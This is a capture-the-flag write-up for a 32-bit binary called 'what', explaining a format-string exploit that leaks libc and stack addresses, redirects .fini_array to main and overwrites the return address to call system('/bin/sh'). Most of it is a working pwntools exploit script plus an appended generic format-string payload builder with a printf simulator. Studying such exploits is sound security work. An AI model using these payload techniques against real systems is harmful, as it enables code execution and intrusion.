System Hacking / cykor

what - libc leak and stack address leak with a FSB using $ (positional arguments), .fini_array overwritten to main

by sonysame 2018. 1. 23.

what



Leak a libc pointer and a stack pointer with %2$x and %264$x (argument 2 holds a libc address, argument 264 a stack address; the offsets are specific to this binary and must be checked with a few %N$x probes first).

.fini_array is writable, so overwrite its entry with main's address: when main returns, exit() walks .fini_array and main runs a second time, giving us a second format string. Only the low 16 bits need to change (the high half is already 0x0804), so one %hn is enough; the padding is chosen so that the total character count is 4 + 8 + 8 + 33927 = 33947 = 0x849b.

With the second format string, overwrite the return address with the address of system and return address+8 with the address of "/bin/sh" (return address+4 is system's own return address and can hold anything). Each target is written in two 16-bit halves, and the values must be emitted in increasing order because printf's character count only ever grows. The addresses placed in the buffer must not contain 0x00 (ends the format string) or 0x0a (ends the input line).




from pwn import *

s = process('./what')
#print(s.recv(1024))
#raw_input()

# Stage 1: leak a libc pointer and a stack pointer, and point .fini_array[0] at main.
# The start of our buffer is printf argument 7, so %7$hn writes to the address placed first.
payload = p32(0x080496dc)      # .fini_array[0]: writable, called from exit()
payload += b"%2$x"             # libc pointer (8 hex digits)
payload += b"%264$x"           # stack pointer (8 hex digits)
payload += b"%33927c"          # 4 + 8 + 8 + 33927 = 33947 = 0x849b, the low half of main
payload += b"%7$hn"            # .fini_array[0] low 16 bits := 0x849b, so exit() re-enters main
s.send(payload + b"\n")

a = s.recv(1024)[0x1a:0x2a]    # the 16 hex digits of the two leaks
libc = int(a[0:8], 16)
system = libc - 0x16d910       # offsets valid for the libc the author solved this against
sh = libc - 0x4af34            # "/bin/sh" string in libc
stack = int(a[8:16], 16)
stack = stack - 0xe4           # return address slot of the second main() run

# Split each target into 16-bit halves. The +0x10000/+0x20000/+0x30000 terms keep
# the four %n values strictly increasing, which is required because the printed
# character count only ever goes up; the high bytes of each 4-byte %n write spill
# into ret+4..ret+5 and ret+12..ret+13, where they do not matter.
system1 = system & 0xffff
system2 = (system >> 16) + 0x10000
sh1 = (sh & 0xffff) + 0x20000
sh2 = (sh >> 16) + 0x30000

print(hex(system))
print(hex(system1))
print(hex(system2))
print(hex(sh))
print(hex(sh1))
print(hex(sh2))
print(hex(stack))

# the four addresses at the front of payload2 are already 16 printed characters
system1 = system1 - 0x10
system2 = system2 - 0x10
sh1 = sh1 - 0x10
sh2 = sh2 - 0x10

# Stage 2: ret -> system, ret+8 -> "/bin/sh" (ret+4 is system's own return address, left as garbage)
payload2 = p32(stack)          # arg 7:  ret     (low half of system)
payload2 += p32(stack + 2)     # arg 8:  ret+2   (high half of system)
payload2 += p32(stack + 8)     # arg 9:  ret+8   (low half of &"/bin/sh")
payload2 += p32(stack + 10)    # arg 10: ret+10  (high half of &"/bin/sh")
payload2 += b"%" + str(system1).encode() + b"c"
payload2 += b"%7$n"
payload2 += b"%" + str(system2 - system1).encode() + b"c"
payload2 += b"%8$n"
payload2 += b"%" + str(sh1 - system2).encode() + b"c"
payload2 += b"%9$n"
payload2 += b"%" + str(sh2 - sh1).encode() + b"c"
payload2 += b"%10$n"
s.send(payload2 + b"\n")

s.recv(1024)
s.interactive()
s.close()
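The second-stage arithmetic above is easy to get wrong by hand, so here is an added example (not code from the original post) that generalizes it: every 32-bit target is split into two 16-bit halves written with %hn, the halves are emitted in ascending order, and each pad is computed modulo 0x10000, so no +0x10000 staggering is needed and the pad never exceeds 65535. A small model of printf (literal bytes, %Nc, %k$n, %k$hn) then replays the payload and shows what would land in memory. The addresses used in the demo (return slot 0xffffd0e4, system 0xf7e13da0, "/bin/sh" 0xf7f5bf34) and the function names are constructed for illustration; the buffer-at-argument-7 layout is the one from the post.

```python
import struct

# Added example, not part of the original post. Generalizes the stage-2 write:
# 16-bit %hn writes in ascending order, pads computed modulo 0x10000.

BAD_BYTES = b"\x00\n"  # NUL ends the format string; '\n' ends the fgets()/gets() line


def build_fsb_payload(writes, buf_arg):
    """Build a format string performing the given 32-bit writes.

    writes  : list of (address, value) pairs
    buf_arg : printf argument index at which our buffer begins (7 for 'what')
    Addresses go first (4 bytes each, one per argument slot); printf counts those
    bytes as output, so the running total starts at len(addresses).
    """
    chunks = []
    for addr, value in writes:
        chunks.append((addr, value & 0xffff))
        chunks.append((addr + 2, (value >> 16) & 0xffff))
    payload = b"".join(struct.pack("<I", addr) for addr, _ in chunks)
    printed = len(payload)
    # chunk i lives in argument slot buf_arg + i; write smallest value first
    for value, idx in sorted((val, buf_arg + i) for i, (_, val) in enumerate(chunks)):
        pad = (value - printed) % 0x10000   # %hn keeps only the low 16 bits of the count
        if pad:
            payload += b"%%%dc" % pad       # %Nc prints exactly N characters (N >= 1)
            printed += pad
        payload += b"%%%d$hn" % idx
    return payload


def has_bad_bytes(payload):
    """True if the payload would be cut short by the string or line terminator."""
    return any(b in payload for b in BAD_BYTES)


def simulate_printf(fmt, args, mem):
    """printf model for the subset we use: literal bytes, %Nc, %k$n, %k$hn.

    args: {argument index: 32-bit value}; mem: dict address -> byte value.
    Returns the number of characters printf would have output.
    """
    count, i = 0, 0
    while i < len(fmt):
        if fmt[i] != 0x25:                  # not '%': printed as-is
            count += 1
            i += 1
            continue
        i += 1
        num = 0
        while i < len(fmt) and 48 <= fmt[i] <= 57:   # width or argument number
            num = num * 10 + fmt[i] - 48
            i += 1
        if fmt[i:i + 1] == b"c":
            count += max(num, 1)
            i += 1
            continue
        if fmt[i:i + 1] != b"$":
            raise ValueError("unsupported conversion at offset %d" % i)
        if fmt[i + 1:i + 3] == b"hn":
            width, i = 2, i + 3
        elif fmt[i + 1:i + 2] == b"n":
            width, i = 4, i + 2
        else:
            raise ValueError("unsupported conversion at offset %d" % i)
        addr = args[num]                    # %k$n stores the count through argument k
        for k in range(width):
            mem[addr + k] = (count >> (8 * k)) & 0xff
    return count


def stage2(ret_addr, system_addr, binsh_addr, buf_arg=7):
    """Build ret -> system, ret+8 -> "/bin/sh" and replay it in the printf model.

    Returns (payload, value now at ret, value now at ret+8)."""
    payload = build_fsb_payload([(ret_addr, system_addr), (ret_addr + 8, binsh_addr)], buf_arg)
    if has_bad_bytes(payload):
        raise ValueError("payload contains NUL or newline; choose another layout")
    # the four address slots at the front of the buffer are what printf sees as args 7..10
    args = {buf_arg + i: struct.unpack_from("<I", payload, 4 * i)[0] for i in range(4)}
    mem = {}
    simulate_printf(payload, args, mem)
    read32 = lambda a: struct.unpack("<I", bytes(mem[a + k] for k in range(4)))[0]
    return payload, read32(ret_addr), read32(ret_addr + 8)


if __name__ == "__main__":
    # constructed sample addresses, not the ones leaked from the real binary
    p, at_ret, at_ret8 = stage2(0xffffd0e4, 0xf7e13da0, 0xf7f5bf34)
    print(p)
    print(hex(at_ret), hex(at_ret8))
```

Because the halves are sorted by value rather than by address, the format string may write ret+8 before ret+2; that is fine, since each %hn only touches its own two bytes. The same builder produces the stage-1 .fini_array write (one 32-bit entry, two %hn) if you prefer it to the single %hn in the script.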